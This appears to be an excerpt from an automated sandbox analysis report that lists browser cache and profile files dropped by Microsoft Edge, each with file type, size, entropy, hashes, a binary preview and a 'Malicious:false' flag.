                                                                                                                                                                                                                                                                                                              Preview:...@..@...@.....C.].....@...................`...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".cshors20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@.................................'.....<.w..U..d.y.oK.>.........."....."...2...".*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z.....Zd;.'@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered...

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):280
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.7560310754779649
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:FiWWltlS7T7cSgwt/uB2RRR5NNWWQeKl//l:o1ucwt2gPvXKl
                                                                                                                                                                                                                                                                                                              MD5:E956145415A724D137B90EFF72B9DC2D
                                                                                                                                                                                                                                                                                                              SHA1:91166338BA03229FC5B2EE7F8277E6671CBDD443
                                                                                                                                                                                                                                                                                                              SHA-256:948EF76E909C0EA977B38155B920E6128C0FF60131334D4CE5181E4BEF6934B7
                                                                                                                                                                                                                                                                                                              SHA-512:20323D3538D9A9DFD835D94049B8069A046627136C32C40896C1C735310E060CE0464DD331E55BC3B41B364B9A53F997C91B33864F641B6895C765425C6BD280
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:sdPC....................x...%.yI..y.....................................................................................................................................................................................................92d09483-a0e9-4432-90a7-7c4d2e894f54............

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Crashpad\throttle_store.dat

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6219280948873624
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                                                                                                                                                                                                                              MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                                                                                                                                                                                                                              SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                                                                                                                                                                                                                              SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                                                                                                                                                                                                                              SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:level=none expiry=0.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\7976fe8c-7311-436d-88f6-a0d948cda570.tmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Cache\Cache_Data\data_0

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):45056
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.012760698469074051
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsFlYhEtlGJllTxFKljNxftKln9n/1vEtDt:/FiEXGlcNxftY9NED
                                                                                                                                                                                                                                                                                                              MD5:C0AA5606C91FC2676D55D75172D92D4E
                                                                                                                                                                                                                                                                                                              SHA1:B1D7ED2260490A168A18B4FAE444C8CC01E47E0F
                                                                                                                                                                                                                                                                                                              SHA-256:E18D8CEB85C5065E558AAE142606CF3E209E046D655874A52B7F30A908302809
                                                                                                                                                                                                                                                                                                              SHA-512:D1959DC685A764752131A288BDC2318B68FDDB1FEE94EF483A8197003E0CDF1EE78BA3AF62123691CB4F53D3621A21CD6AA66DE4B24A1357CE22FB4B1D80351C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Cache\Cache_Data\data_1

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.02887548200261327
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:U/BEfnTrjXcdCIRrYfhbtZPC93OHjsqJm09MWPG:qKTrjsd/Rc1PCQHjTpM
                                                                                                                                                                                                                                                                                                              MD5:2D1B6280E1685E148119A542128D1275
                                                                                                                                                                                                                                                                                                              SHA1:A6FD3A398F73714E48D78003676267CB4AD867A1
                                                                                                                                                                                                                                                                                                              SHA-256:3765F7FA0E176F33BFE547AEA17BECB811805E607663EF427503E28BC654BBA0
                                                                                                                                                                                                                                                                                                              SHA-512:7B792D188FE511981A92A149937DF67293DB25A032D95AEEE77A0485659AEF347A5C1D77B7E104AF15A58190A3C462D34B462F69FB5A90785DC9326C48EF8469
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:................................................................................s.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Cache\Cache_Data\data_2

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Cache\Cache_Data\data_3

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Cache\Cache_Data\index

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):524656
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.027445846313988E-4
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:LsulLC4lt:Lsto
                                                                                                                                                                                                                                                                                                              MD5:D597ACD4CF507172695E6340309D8BDC
                                                                                                                                                                                                                                                                                                              SHA1:D5FE7C200AC9B4D9094F8EA9FA187A3E8EF84A45
                                                                                                                                                                                                                                                                                                              SHA-256:8F6B9859F0E1B77FB5CA38A5C36E2C058D3C5EE1F78E278F5D86AD5696C34512
                                                                                                                                                                                                                                                                                                              SHA-512:2C1E787AB9C9C4CD62F629A2C15F85D1F16007BB3C0A3654BB8A516D87CAE89A5BE6E88D3BB50A6F3B336225FB9BFE4D1E24C2A2BE3490FEC1CA6CA8490C89FC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........................................f\,.z./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Code Cache\js\index

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:0\r..m..................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Code Cache\js\index-dir\temp-index

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:sEfE734:sEM7o
                                                                                                                                                                                                                                                                                                              MD5:3AF790F778B78820CB9E33FD85859F8A
                                                                                                                                                                                                                                                                                                              SHA1:56C39500428BCC7F0C37413BF1659AB577ED739D
                                                                                                                                                                                                                                                                                                              SHA-256:ECB88D3E551833CD4A0D081B194E947B699407D66F25D1618815B09B6D12E254
                                                                                                                                                                                                                                                                                                              SHA-512:F80A2B53B2A96F1B16288765000E1CB2DFC9313A2A1AD219B7498EA659E02EB5BD4EE6FC0E314EFF538034F506DB8C70A21EC674DF8823AD295C277C75065F80
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:(...q...oy retne........................'.#.z./.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Code Cache\js\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:sEfE734:sEM7o
                                                                                                                                                                                                                                                                                                              MD5:3AF790F778B78820CB9E33FD85859F8A
                                                                                                                                                                                                                                                                                                              SHA1:56C39500428BCC7F0C37413BF1659AB577ED739D
                                                                                                                                                                                                                                                                                                              SHA-256:ECB88D3E551833CD4A0D081B194E947B699407D66F25D1618815B09B6D12E254
                                                                                                                                                                                                                                                                                                              SHA-512:F80A2B53B2A96F1B16288765000E1CB2DFC9313A2A1AD219B7498EA659E02EB5BD4EE6FC0E314EFF538034F506DB8C70A21EC674DF8823AD295C277C75065F80
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:(...q...oy retne........................'.#.z./.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Code Cache\wasm\index

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:0\r..m..................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Code Cache\wasm\index-dir\temp-index

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:3RkdESeF+:z7+
                                                                                                                                                                                                                                                                                                              MD5:2B07AEC2296AC3A65FE975A641CA8DD6
                                                                                                                                                                                                                                                                                                              SHA1:FF6E7FCD48144495F367FD08DEC36E9E542B9188
                                                                                                                                                                                                                                                                                                              SHA-256:0C568256FA2C95D41F3A111C2C438146CA9C669A4200CA8B367E248D792C83F8
                                                                                                                                                                                                                                                                                                              SHA-512:1BFD062F07C79BE47DFB225961797CAC0FDA81BD75C00221B14CA52BA902A0D60044F87AA169EA237788D42DF1ED2983D97D19FE0E5F96AECB0C299C9B73CA18
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:(...j.UAoy retne.........................s#.z./.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Code Cache\wasm\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:3RkdESeF+:z7+
                                                                                                                                                                                                                                                                                                              MD5:2B07AEC2296AC3A65FE975A641CA8DD6
                                                                                                                                                                                                                                                                                                              SHA1:FF6E7FCD48144495F367FD08DEC36E9E542B9188
                                                                                                                                                                                                                                                                                                              SHA-256:0C568256FA2C95D41F3A111C2C438146CA9C669A4200CA8B367E248D792C83F8
                                                                                                                                                                                                                                                                                                              SHA-512:1BFD062F07C79BE47DFB225961797CAC0FDA81BD75C00221B14CA52BA902A0D60044F87AA169EA237788D42DF1ED2983D97D19FE0E5F96AECB0C299C9B73CA18
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:(...j.UAoy retne.........................s#.z./.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\DawnCache\data_0

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\DawnCache\data_1

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                                              Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                              MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\DawnCache\data_2

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\DawnCache\data_3

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\DawnCache\index

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):262512
                                                                                                                                                                                                                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:LsNlCmtK//:Ls3CB/
                                                                                                                                                                                                                                                                                                              MD5:AACE01646779CAAE2B7C0AFF48824044
                                                                                                                                                                                                                                                                                                              SHA1:441BD11C95182A935A7D265D4D1357B96BF83E07
                                                                                                                                                                                                                                                                                                              SHA-256:45A2DF0CDA5F9ADAFAD490850C1BFD0E8553CC8F9225520F03CB573F119A0A46
                                                                                                                                                                                                                                                                                                              SHA-512:AAC930D00E5D5B3D52F1FA3BED44921AC75543FD5FC216FF11E362A04361230D0C66672BF6719717994C0B536D65EC778654C50E2FC286D5AECA7F4130AADE16
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.........................................&.z./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\EdgeCoupons\coupons_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):33
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                              MD5:F27314DD366903BBC6141EAE524B0FDE
